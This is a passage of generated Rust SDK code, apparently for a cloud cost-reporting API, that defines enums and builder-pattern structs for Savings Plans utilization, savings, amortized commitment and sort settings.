    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum Metric {
    AmortizedCost,
    BlendedCost,
    NetAmortizedCost,
    NetUnblendedCost,
    NormalizedUsageAmount,
    UnblendedCost,
    UsageQuantity,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for Metric {
    /// Maps a wire string onto the matching variant, preserving
    /// unrecognized input in `Unknown`.
    fn from(s: &str) -> Self {
        match s {
            "AMORTIZED_COST" => Self::AmortizedCost,
            "BLENDED_COST" => Self::BlendedCost,
            "NET_AMORTIZED_COST" => Self::NetAmortizedCost,
            "NET_UNBLENDED_COST" => Self::NetUnblendedCost,
            "NORMALIZED_USAGE_AMOUNT" => Self::NormalizedUsageAmount,
            "UNBLENDED_COST" => Self::UnblendedCost,
            "USAGE_QUANTITY" => Self::UsageQuantity,
            _ => Self::Unknown(s.to_owned()),
        }
    }
}
impl std::str::FromStr for Metric {
    type Err = std::convert::Infallible;
    /// Parsing never fails; unrecognized input becomes `Unknown`.
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(s.into())
    }
}
impl Metric {
    /// Returns the wire representation of this variant.
    pub fn as_str(&self) -> &str {
        match self {
            Self::AmortizedCost => "AMORTIZED_COST",
            Self::BlendedCost => "BLENDED_COST",
            Self::NetAmortizedCost => "NET_AMORTIZED_COST",
            Self::NetUnblendedCost => "NET_UNBLENDED_COST",
            Self::NormalizedUsageAmount => "NORMALIZED_USAGE_AMOUNT",
            Self::UnblendedCost => "UNBLENDED_COST",
            Self::UsageQuantity => "USAGE_QUANTITY",
            Self::Unknown(value) => value.as_str(),
        }
    }
    /// Returns every wire value known at code-generation time.
    pub fn values() -> &'static [&'static str] {
        &[
            "AMORTIZED_COST",
            "BLENDED_COST",
            "NET_AMORTIZED_COST",
            "NET_UNBLENDED_COST",
            "NORMALIZED_USAGE_AMOUNT",
            "UNBLENDED_COST",
            "USAGE_QUANTITY",
        ]
    }
}
impl AsRef<str> for Metric {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// <p>The details of how to sort the data.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SortDefinition {
    /// <p>The key that's used to sort the data.</p>
    pub key: std::option::Option<std::string::String>,
    /// <p>The order that's used to sort the data.</p>
    pub sort_order: std::option::Option<crate::model::SortOrder>,
}
impl std::fmt::Debug for SortDefinition {
    /// Renders both fields through `Formatter::debug_struct`.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("SortDefinition")
            .field("key", &self.key)
            .field("sort_order", &self.sort_order)
            .finish()
    }
}
/// See [`SortDefinition`](crate::model::SortDefinition)
pub mod sort_definition {
    /// A builder for [`SortDefinition`](crate::model::SortDefinition)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) key: std::option::Option<std::string::String>,
        pub(crate) sort_order: std::option::Option<crate::model::SortOrder>,
    }
    impl Builder {
        /// <p>The key that's used to sort the data.</p>
        pub fn key(self, input: impl Into<std::string::String>) -> Self {
            Self {
                key: Some(input.into()),
                ..self
            }
        }
        /// Replaces the sort key with an explicit optional value.
        pub fn set_key(self, input: std::option::Option<std::string::String>) -> Self {
            Self { key: input, ..self }
        }
        /// <p>The order that's used to sort the data.</p>
        pub fn sort_order(self, input: crate::model::SortOrder) -> Self {
            Self {
                sort_order: Some(input),
                ..self
            }
        }
        /// Replaces the sort order with an explicit optional value.
        pub fn set_sort_order(
            self,
            input: std::option::Option<crate::model::SortOrder>,
        ) -> Self {
            Self {
                sort_order: input,
                ..self
            }
        }
        /// Consumes the builder and constructs a [`SortDefinition`](crate::model::SortDefinition)
        pub fn build(self) -> crate::model::SortDefinition {
            crate::model::SortDefinition {
                key: self.key,
                sort_order: self.sort_order,
            }
        }
    }
}
impl SortDefinition {
    /// Creates a new builder-style object to manufacture [`SortDefinition`](crate::model::SortDefinition)
    pub fn builder() -> crate::model::sort_definition::Builder {
        Default::default()
    }
}
/// String-backed enumeration of sort directions
/// (`ASCENDING`, `DESCENDING`); values added to the service after code
/// generation round-trip through `Unknown`.
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum SortOrder {
    Ascending,
    Descending,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for SortOrder {
    /// Maps a wire string onto the matching variant, preserving
    /// unrecognized input in `Unknown`.
    fn from(s: &str) -> Self {
        match s {
            "ASCENDING" => Self::Ascending,
            "DESCENDING" => Self::Descending,
            _ => Self::Unknown(s.to_owned()),
        }
    }
}
impl std::str::FromStr for SortOrder {
    type Err = std::convert::Infallible;
    /// Parsing never fails; unrecognized input becomes `Unknown`.
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(s.into())
    }
}
impl SortOrder {
    /// Returns the wire representation of this variant.
    pub fn as_str(&self) -> &str {
        match self {
            Self::Ascending => "ASCENDING",
            Self::Descending => "DESCENDING",
            Self::Unknown(value) => value.as_str(),
        }
    }
    /// Returns every wire value known at code-generation time.
    pub fn values() -> &'static [&'static str] {
        &["ASCENDING", "DESCENDING"]
    }
}
impl AsRef<str> for SortOrder {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// <p>The aggregated utilization metrics for your Savings Plans usage.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansUtilizationAggregates {
/// <p>A ratio of your effectiveness of using existing Savings Plans to apply to workloads
/// that are Savings Plans eligible.</p>
pub utilization: std::option::Option<crate::model::SavingsPlansUtilization>,
/// <p>The amount saved by using existing Savings Plans. Savings returns both net savings
/// from Savings Plans, as well as the <code>onDemandCostEquivalent</code> of the Savings
/// Plans when considering the utilization rate.</p>
pub savings: std::option::Option<crate::model::SavingsPlansSavings>,
/// <p>The total amortized commitment for a Savings Plans. This includes the sum of the
/// upfront and recurring Savings Plans fees.</p>
pub amortized_commitment: std::option::Option<crate::model::SavingsPlansAmortizedCommitment>,
}
impl std::fmt::Debug for SavingsPlansUtilizationAggregates {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("SavingsPlansUtilizationAggregates");
formatter.field("utilization", &self.utilization);
formatter.field("savings", &self.savings);
formatter.field("amortized_commitment", &self.amortized_commitment);
formatter.finish()
}
}
/// See [`SavingsPlansUtilizationAggregates`](crate::model::SavingsPlansUtilizationAggregates)
pub mod savings_plans_utilization_aggregates {
    /// A builder for [`SavingsPlansUtilizationAggregates`](crate::model::SavingsPlansUtilizationAggregates)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) utilization: std::option::Option<crate::model::SavingsPlansUtilization>,
        pub(crate) savings: std::option::Option<crate::model::SavingsPlansSavings>,
        pub(crate) amortized_commitment:
            std::option::Option<crate::model::SavingsPlansAmortizedCommitment>,
    }
    impl Builder {
        /// <p>A ratio of your effectiveness of using existing Savings Plans to apply to workloads
        /// that are Savings Plans eligible.</p>
        pub fn utilization(mut self, input: crate::model::SavingsPlansUtilization) -> Self {
            self.utilization = Some(input);
            self
        }
        /// Sets `utilization` from an `Option`, replacing any previously configured value
        /// (`None` clears it).
        pub fn set_utilization(
            mut self,
            input: std::option::Option<crate::model::SavingsPlansUtilization>,
        ) -> Self {
            self.utilization = input;
            self
        }
        /// <p>The amount saved by using existing Savings Plans. Savings returns both net savings
        /// from Savings Plans, as well as the <code>onDemandCostEquivalent</code> of the Savings
        /// Plans when considering the utilization rate.</p>
        pub fn savings(mut self, input: crate::model::SavingsPlansSavings) -> Self {
            self.savings = Some(input);
            self
        }
        /// Sets `savings` from an `Option`, replacing any previously configured value
        /// (`None` clears it).
        pub fn set_savings(
            mut self,
            input: std::option::Option<crate::model::SavingsPlansSavings>,
        ) -> Self {
            self.savings = input;
            self
        }
        /// <p>The total amortized commitment for a Savings Plans. This includes the sum of the
        /// upfront and recurring Savings Plans fees.</p>
        pub fn amortized_commitment(
            mut self,
            input: crate::model::SavingsPlansAmortizedCommitment,
        ) -> Self {
            self.amortized_commitment = Some(input);
            self
        }
        /// Sets `amortized_commitment` from an `Option`, replacing any previously configured
        /// value (`None` clears it).
        pub fn set_amortized_commitment(
            mut self,
            input: std::option::Option<crate::model::SavingsPlansAmortizedCommitment>,
        ) -> Self {
            self.amortized_commitment = input;
            self
        }
        /// Consumes the builder and constructs a [`SavingsPlansUtilizationAggregates`](crate::model::SavingsPlansUtilizationAggregates)
        pub fn build(self) -> crate::model::SavingsPlansUtilizationAggregates {
            crate::model::SavingsPlansUtilizationAggregates {
                utilization: self.utilization,
                savings: self.savings,
                amortized_commitment: self.amortized_commitment,
            }
        }
    }
}
impl SavingsPlansUtilizationAggregates {
    /// Creates a new builder-style object to manufacture [`SavingsPlansUtilizationAggregates`](crate::model::SavingsPlansUtilizationAggregates)
    pub fn builder() -> crate::model::savings_plans_utilization_aggregates::Builder {
        // The builder derives `Default`, so the zero-value builder is the starting point.
        std::default::Default::default()
    }
}
/// <p>The amortized amount of Savings Plans purchased in a specific account during a
/// specific time interval.</p>
// NOTE(review): the commitment amounts are service-provided strings — presumably decimal
// currency values; confirm the format before parsing numerically.
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansAmortizedCommitment {
    /// <p>The amortized amount of your Savings Plans commitment that was purchased with either a
    /// <code>Partial</code> or a <code>NoUpfront</code>.</p>
    pub amortized_recurring_commitment: std::option::Option<std::string::String>,
    /// <p>The amortized amount of your Savings Plans commitment that was purchased with an
    /// <code>Upfront</code> or <code>PartialUpfront</code> Savings Plans.</p>
    pub amortized_upfront_commitment: std::option::Option<std::string::String>,
    /// <p>The total amortized amount of your Savings Plans commitment, regardless of your
    /// Savings Plans purchase method. </p>
    pub total_amortized_commitment: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for SavingsPlansAmortizedCommitment {
    /// Renders the struct with each field labeled by its Rust field name.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("SavingsPlansAmortizedCommitment")
            .field(
                "amortized_recurring_commitment",
                &self.amortized_recurring_commitment,
            )
            .field(
                "amortized_upfront_commitment",
                &self.amortized_upfront_commitment,
            )
            .field(
                "total_amortized_commitment",
                &self.total_amortized_commitment,
            )
            .finish()
    }
}
/// See [`SavingsPlansAmortizedCommitment`](crate::model::SavingsPlansAmortizedCommitment)
pub mod savings_plans_amortized_commitment {
    /// A builder for [`SavingsPlansAmortizedCommitment`](crate::model::SavingsPlansAmortizedCommitment)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) amortized_recurring_commitment: std::option::Option<std::string::String>,
        pub(crate) amortized_upfront_commitment: std::option::Option<std::string::String>,
        pub(crate) total_amortized_commitment: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The amortized amount of your Savings Plans commitment that was purchased with either a
        /// <code>Partial</code> or a <code>NoUpfront</code>.</p>
        pub fn amortized_recurring_commitment(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.amortized_recurring_commitment = Some(input.into());
            self
        }
        /// Sets `amortized_recurring_commitment` from an `Option`, replacing any previously
        /// configured value (`None` clears it).
        pub fn set_amortized_recurring_commitment(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.amortized_recurring_commitment = input;
            self
        }
        /// <p>The amortized amount of your Savings Plans commitment that was purchased with an
        /// <code>Upfront</code> or <code>PartialUpfront</code> Savings Plans.</p>
        pub fn amortized_upfront_commitment(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.amortized_upfront_commitment = Some(input.into());
            self
        }
        /// Sets `amortized_upfront_commitment` from an `Option`, replacing any previously
        /// configured value (`None` clears it).
        pub fn set_amortized_upfront_commitment(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.amortized_upfront_commitment = input;
            self
        }
        /// <p>The total amortized amount of your Savings Plans commitment, regardless of your
        /// Savings Plans purchase method. </p>
        pub fn total_amortized_commitment(mut self, input: impl Into<std::string::String>) -> Self {
            self.total_amortized_commitment = Some(input.into());
            self
        }
        /// Sets `total_amortized_commitment` from an `Option`, replacing any previously
        /// configured value (`None` clears it).
        pub fn set_total_amortized_commitment(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.total_amortized_commitment = input;
            self
        }
        /// Consumes the builder and constructs a [`SavingsPlansAmortizedCommitment`](crate::model::SavingsPlansAmortizedCommitment)
        pub fn build(self) -> crate::model::SavingsPlansAmortizedCommitment {
            crate::model::SavingsPlansAmortizedCommitment {
                amortized_recurring_commitment: self.amortized_recurring_commitment,
                amortized_upfront_commitment: self.amortized_upfront_commitment,
                total_amortized_commitment: self.total_amortized_commitment,
            }
        }
    }
}
impl SavingsPlansAmortizedCommitment {
    /// Creates a new builder-style object to manufacture [`SavingsPlansAmortizedCommitment`](crate::model::SavingsPlansAmortizedCommitment)
    pub fn builder() -> crate::model::savings_plans_amortized_commitment::Builder {
        // The builder derives `Default`, so the zero-value builder is the starting point.
        std::default::Default::default()
    }
}
/// <p>The amount of savings that you're accumulating, against the public On-Demand rate of
/// the usage accrued in an account.</p>
// NOTE(review): both amounts are service-provided strings — presumably decimal currency
// values; confirm the format before parsing numerically.
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansSavings {
    /// <p>The savings amount that you're accumulating for the usage that's covered by a Savings
    /// Plans, when compared to the On-Demand equivalent of the same usage.</p>
    pub net_savings: std::option::Option<std::string::String>,
    /// <p>How much the amount that the usage would have cost if it was accrued at the On-Demand
    /// rate.</p>
    pub on_demand_cost_equivalent: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for SavingsPlansSavings {
    /// Renders the struct with each field labeled by its Rust field name.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("SavingsPlansSavings")
            .field("net_savings", &self.net_savings)
            .field("on_demand_cost_equivalent", &self.on_demand_cost_equivalent)
            .finish()
    }
}
/// See [`SavingsPlansSavings`](crate::model::SavingsPlansSavings)
pub mod savings_plans_savings {
    /// A builder for [`SavingsPlansSavings`](crate::model::SavingsPlansSavings)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) net_savings: std::option::Option<std::string::String>,
        pub(crate) on_demand_cost_equivalent: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The savings amount that you're accumulating for the usage that's covered by a Savings
        /// Plans, when compared to the On-Demand equivalent of the same usage.</p>
        pub fn net_savings(mut self, input: impl Into<std::string::String>) -> Self {
            self.net_savings = Some(input.into());
            self
        }
        /// Sets `net_savings` from an `Option`, replacing any previously configured value
        /// (`None` clears it).
        pub fn set_net_savings(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.net_savings = input;
            self
        }
        /// <p>How much the amount that the usage would have cost if it was accrued at the On-Demand
        /// rate.</p>
        pub fn on_demand_cost_equivalent(mut self, input: impl Into<std::string::String>) -> Self {
            self.on_demand_cost_equivalent = Some(input.into());
            self
        }
        /// Sets `on_demand_cost_equivalent` from an `Option`, replacing any previously
        /// configured value (`None` clears it).
        pub fn set_on_demand_cost_equivalent(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.on_demand_cost_equivalent = input;
            self
        }
        /// Consumes the builder and constructs a [`SavingsPlansSavings`](crate::model::SavingsPlansSavings)
        pub fn build(self) -> crate::model::SavingsPlansSavings {
            crate::model::SavingsPlansSavings {
                net_savings: self.net_savings,
                on_demand_cost_equivalent: self.on_demand_cost_equivalent,
            }
        }
    }
}
impl SavingsPlansSavings {
    /// Creates a new builder-style object to manufacture [`SavingsPlansSavings`](crate::model::SavingsPlansSavings)
    pub fn builder() -> crate::model::savings_plans_savings::Builder {
        // The builder derives `Default`, so the zero-value builder is the starting point.
        std::default::Default::default()
    }
}
/// <p>The measurement of how well you're using your existing Savings Plans.</p>
// NOTE(review): all values are service-provided strings — presumably decimal amounts
// (and a percentage for `utilization_percentage`); confirm the format before parsing.
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansUtilization {
    /// <p>The total amount of Savings Plans commitment that's been purchased in an account (or
    /// set of accounts).</p>
    pub total_commitment: std::option::Option<std::string::String>,
    /// <p>The amount of your Savings Plans commitment that was consumed from Savings Plans
    /// eligible usage in a specific period.</p>
    pub used_commitment: std::option::Option<std::string::String>,
    /// <p>The amount of your Savings Plans commitment that wasn't consumed from Savings Plans
    /// eligible usage in a specific period.</p>
    pub unused_commitment: std::option::Option<std::string::String>,
    /// <p>The amount of <code>UsedCommitment</code> divided by the <code>TotalCommitment</code>
    /// for your Savings Plans.</p>
    pub utilization_percentage: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for SavingsPlansUtilization {
    /// Renders the struct with each field labeled by its Rust field name.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("SavingsPlansUtilization")
            .field("total_commitment", &self.total_commitment)
            .field("used_commitment", &self.used_commitment)
            .field("unused_commitment", &self.unused_commitment)
            .field("utilization_percentage", &self.utilization_percentage)
            .finish()
    }
}
/// See [`SavingsPlansUtilization`](crate::model::SavingsPlansUtilization)
pub mod savings_plans_utilization {
    /// A builder for [`SavingsPlansUtilization`](crate::model::SavingsPlansUtilization)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) total_commitment: std::option::Option<std::string::String>,
        pub(crate) used_commitment: std::option::Option<std::string::String>,
        pub(crate) unused_commitment: std::option::Option<std::string::String>,
        pub(crate) utilization_percentage: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The total amount of Savings Plans commitment that's been purchased in an account (or
        /// set of accounts).</p>
        pub fn total_commitment(mut self, input: impl Into<std::string::String>) -> Self {
            self.total_commitment = Some(input.into());
            self
        }
        /// Sets `total_commitment` from an `Option`, replacing any previously configured value
        /// (`None` clears it).
        pub fn set_total_commitment(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.total_commitment = input;
            self
        }
        /// <p>The amount of your Savings Plans commitment that was consumed from Savings Plans
        /// eligible usage in a specific period.</p>
        pub fn used_commitment(mut self, input: impl Into<std::string::String>) -> Self {
            self.used_commitment = Some(input.into());
            self
        }
        /// Sets `used_commitment` from an `Option`, replacing any previously configured value
        /// (`None` clears it).
        pub fn set_used_commitment(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.used_commitment = input;
            self
        }
        /// <p>The amount of your Savings Plans commitment that wasn't consumed from Savings Plans
        /// eligible usage in a specific period.</p>
        pub fn unused_commitment(mut self, input: impl Into<std::string::String>) -> Self {
            self.unused_commitment = Some(input.into());
            self
        }
        /// Sets `unused_commitment` from an `Option`, replacing any previously configured value
        /// (`None` clears it).
        pub fn set_unused_commitment(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.unused_commitment = input;
            self
        }
        /// <p>The amount of <code>UsedCommitment</code> divided by the <code>TotalCommitment</code>
        /// for your Savings Plans.</p>
        pub fn utilization_percentage(mut self, input: impl Into<std::string::String>) -> Self {
            self.utilization_percentage = Some(input.into());
            self
        }
        /// Sets `utilization_percentage` from an `Option`, replacing any previously configured
        /// value (`None` clears it).
        pub fn set_utilization_percentage(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.utilization_percentage = input;
            self
        }
        /// Consumes the builder and constructs a [`SavingsPlansUtilization`](crate::model::SavingsPlansUtilization)
        pub fn build(self) -> crate::model::SavingsPlansUtilization {
            crate::model::SavingsPlansUtilization {
                total_commitment: self.total_commitment,
                used_commitment: self.used_commitment,
                unused_commitment: self.unused_commitment,
                utilization_percentage: self.utilization_percentage,
            }
        }
    }
}
impl SavingsPlansUtilization {
    /// Creates a new builder-style object to manufacture [`SavingsPlansUtilization`](crate::model::SavingsPlansUtilization)
    pub fn builder() -> crate::model::savings_plans_utilization::Builder {
        // The builder derives `Default`, so the zero-value builder is the starting point.
        std::default::Default::default()
    }
}
/// <p>A single daily or monthly Savings Plans utilization rate, and details for your
/// account. A management account in an organization have access to member accounts. You can
/// use <code>GetDimensionValues</code> to determine the possible dimension values. </p>
// NOTE(review): every field is optional; populated by the service response — presumably
// absent fields mean "not requested/not applicable", confirm against the API reference.
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansUtilizationDetail {
    /// <p>The unique Amazon Resource Name (ARN) for a particular Savings Plan.</p>
    pub savings_plan_arn: std::option::Option<std::string::String>,
    /// <p>The attribute that applies to a specific <code>Dimension</code>.</p>
    pub attributes:
        std::option::Option<std::collections::HashMap<std::string::String, std::string::String>>,
    /// <p>A ratio of your effectiveness of using existing Savings Plans to apply to workloads
    /// that are Savings Plans eligible.</p>
    pub utilization: std::option::Option<crate::model::SavingsPlansUtilization>,
    /// <p>The amount saved by using existing Savings Plans. Savings returns both net savings
    /// from savings plans as well as the <code>onDemandCostEquivalent</code> of the Savings
    /// Plans when considering the utilization rate.</p>
    pub savings: std::option::Option<crate::model::SavingsPlansSavings>,
    /// <p>The total amortized commitment for a Savings Plans. Includes the sum of the upfront
    /// and recurring Savings Plans fees.</p>
    pub amortized_commitment: std::option::Option<crate::model::SavingsPlansAmortizedCommitment>,
}
impl std::fmt::Debug for SavingsPlansUtilizationDetail {
    /// Renders the struct with each field labeled by its Rust field name.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("SavingsPlansUtilizationDetail")
            .field("savings_plan_arn", &self.savings_plan_arn)
            .field("attributes", &self.attributes)
            .field("utilization", &self.utilization)
            .field("savings", &self.savings)
            .field("amortized_commitment", &self.amortized_commitment)
            .finish()
    }
}
/// See [`SavingsPlansUtilizationDetail`](crate::model::SavingsPlansUtilizationDetail)
pub mod savings_plans_utilization_detail {
    /// A builder for [`SavingsPlansUtilizationDetail`](crate::model::SavingsPlansUtilizationDetail)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) savings_plan_arn: std::option::Option<std::string::String>,
        pub(crate) attributes: std::option::Option<
            std::collections::HashMap<std::string::String, std::string::String>,
        >,
        pub(crate) utilization: std::option::Option<crate::model::SavingsPlansUtilization>,
        pub(crate) savings: std::option::Option<crate::model::SavingsPlansSavings>,
        pub(crate) amortized_commitment:
            std::option::Option<crate::model::SavingsPlansAmortizedCommitment>,
    }
    impl Builder {
        /// <p>The unique Amazon Resource Name (ARN) for a particular Savings Plan.</p>
        pub fn savings_plan_arn(mut self, input: impl Into<std::string::String>) -> Self {
            self.savings_plan_arn = Some(input.into());
            self
        }
        /// Sets `savings_plan_arn` from an `Option`, replacing any previously configured value
        /// (`None` clears it).
        pub fn set_savings_plan_arn(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.savings_plan_arn = input;
            self
        }
        /// Inserts one key/value pair into `attributes`, creating the map on first use.
        /// Repeated calls accumulate entries; a duplicate key overwrites the earlier value.
        pub fn attributes(
            mut self,
            k: impl Into<std::string::String>,
            v: impl Into<std::string::String>,
        ) -> Self {
            let mut hash_map = self.attributes.unwrap_or_default();
            hash_map.insert(k.into(), v.into());
            self.attributes = Some(hash_map);
            self
        }
        /// Replaces the entire `attributes` map with the given `Option` (`None` clears it).
        pub fn set_attributes(
            mut self,
            input: std::option::Option<
                std::collections::HashMap<std::string::String, std::string::String>,
            >,
        ) -> Self {
            self.attributes = input;
            self
        }
        /// <p>A ratio of your effectiveness of using existing Savings Plans to apply to workloads
        /// that are Savings Plans eligible.</p>
        pub fn utilization(mut self, input: crate::model::SavingsPlansUtilization) -> Self {
            self.utilization = Some(input);
            self
        }
        /// Sets `utilization` from an `Option`, replacing any previously configured value
        /// (`None` clears it).
        pub fn set_utilization(
            mut self,
            input: std::option::Option<crate::model::SavingsPlansUtilization>,
        ) -> Self {
            self.utilization = input;
            self
        }
        /// <p>The amount saved by using existing Savings Plans. Savings returns both net savings
        /// from savings plans as well as the <code>onDemandCostEquivalent</code> of the Savings
        /// Plans when considering the utilization rate.</p>
        pub fn savings(mut self, input: crate::model::SavingsPlansSavings) -> Self {
            self.savings = Some(input);
            self
        }
        /// Sets `savings` from an `Option`, replacing any previously configured value
        /// (`None` clears it).
        pub fn set_savings(
            mut self,
            input: std::option::Option<crate::model::SavingsPlansSavings>,
        ) -> Self {
            self.savings = input;
            self
        }
        /// <p>The total amortized commitment for a Savings Plans. Includes the sum of the upfront
        /// and recurring Savings Plans fees.</p>
        pub fn amortized_commitment(
            mut self,
            input: crate::model::SavingsPlansAmortizedCommitment,
        ) -> Self {
            self.amortized_commitment = Some(input);
            self
        }
        /// Sets `amortized_commitment` from an `Option`, replacing any previously configured
        /// value (`None` clears it).
        pub fn set_amortized_commitment(
            mut self,
            input: std::option::Option<crate::model::SavingsPlansAmortizedCommitment>,
        ) -> Self {
            self.amortized_commitment = input;
            self
        }
        /// Consumes the builder and constructs a [`SavingsPlansUtilizationDetail`](crate::model::SavingsPlansUtilizationDetail)
        pub fn build(self) -> crate::model::SavingsPlansUtilizationDetail {
            crate::model::SavingsPlansUtilizationDetail {
                savings_plan_arn: self.savings_plan_arn,
                attributes: self.attributes,
                utilization: self.utilization,
                savings: self.savings,
                amortized_commitment: self.amortized_commitment,
            }
        }
    }
}
impl SavingsPlansUtilizationDetail {
    /// Creates a new builder-style object to manufacture [`SavingsPlansUtilizationDetail`](crate::model::SavingsPlansUtilizationDetail)
    pub fn builder() -> crate::model::savings_plans_utilization_detail::Builder {
        // The builder derives `Default`, so the zero-value builder is the starting point.
        std::default::Default::default()
    }
}
/// The kinds of data that can be requested for a Savings Plans report; each variant
/// maps to a wire-format string (see the `From<&str>` and `as_str` impls).
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum SavingsPlansDataType {
    /// Wire value `AMORTIZED_COMMITMENT`.
    AmortizedCommitment,
    /// Wire value `ATTRIBUTES`.
    Attributes,
    /// Wire value `SAVINGS`.
    Savings,
    /// Wire value `UTILIZATION`.
    Utilization,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for SavingsPlansDataType {
fn from(s: &str) -> Self {
match s {
"AMORTIZED_COMMITMENT" => SavingsPlansDataType::AmortizedCommitment,
"ATTRIBUTES" => SavingsPlansDataType::Attributes,
"SAVINGS" => SavingsPlansDataType::Savings,
"UTILIZATION" => SavingsPlansDataType::Utilization,
other => SavingsPlansDataType::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for SavingsPlansDataType {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(SavingsPlansDataType::from(s))
}
}
impl SavingsPlansDataType {
pub fn as_str(&self) -> &str {
match self {
SavingsPlansDataType::AmortizedCommitment => "AMORTIZED_COMMITMENT",
SavingsPlansDataType::Attributes => "ATTRIBUTES",
SavingsPlansDataType::Savings => "SAVINGS",
SavingsPlansDataType::Utilization => "UTILIZATION",
SavingsPlansDataType::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&[
"AMORTIZED_COMMITMENT",
"ATTRIBUTES",
"SAVINGS",
"UTILIZATION",
]
}
}
impl AsRef<str> for SavingsPlansDataType {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>The amount of Savings Plans utilization, in hours.</p>
// NOTE(review): one entry per reporting interval; all fields are optional and filled
// in from the service response via the builder in `savings_plans_utilization_by_time`.
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansUtilizationByTime {
    /// <p>The time period of the request. </p>
    pub time_period: std::option::Option<crate::model::DateInterval>,
    /// <p>A ratio of your effectiveness of using existing Savings Plans to apply to workloads
    /// that are Savings Plans eligible.</p>
    pub utilization: std::option::Option<crate::model::SavingsPlansUtilization>,
    /// <p>The amount saved by using existing Savings Plans. Savings returns both net savings
    /// from Savings Plans as well as the <code>onDemandCostEquivalent</code> of the Savings
    /// Plans when considering the utilization rate.</p>
    pub savings: std::option::Option<crate::model::SavingsPlansSavings>,
    /// <p>The total amortized commitment for a Savings Plans. This includes the sum of the
    /// upfront and recurring Savings Plans fees.</p>
    pub amortized_commitment: std::option::Option<crate::model::SavingsPlansAmortizedCommitment>,
}
impl std::fmt::Debug for SavingsPlansUtilizationByTime {
    /// Renders the struct with each field labeled by its Rust field name.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("SavingsPlansUtilizationByTime")
            .field("time_period", &self.time_period)
            .field("utilization", &self.utilization)
            .field("savings", &self.savings)
            .field("amortized_commitment", &self.amortized_commitment)
            .finish()
    }
}
/// See [`SavingsPlansUtilizationByTime`](crate::model::SavingsPlansUtilizationByTime)
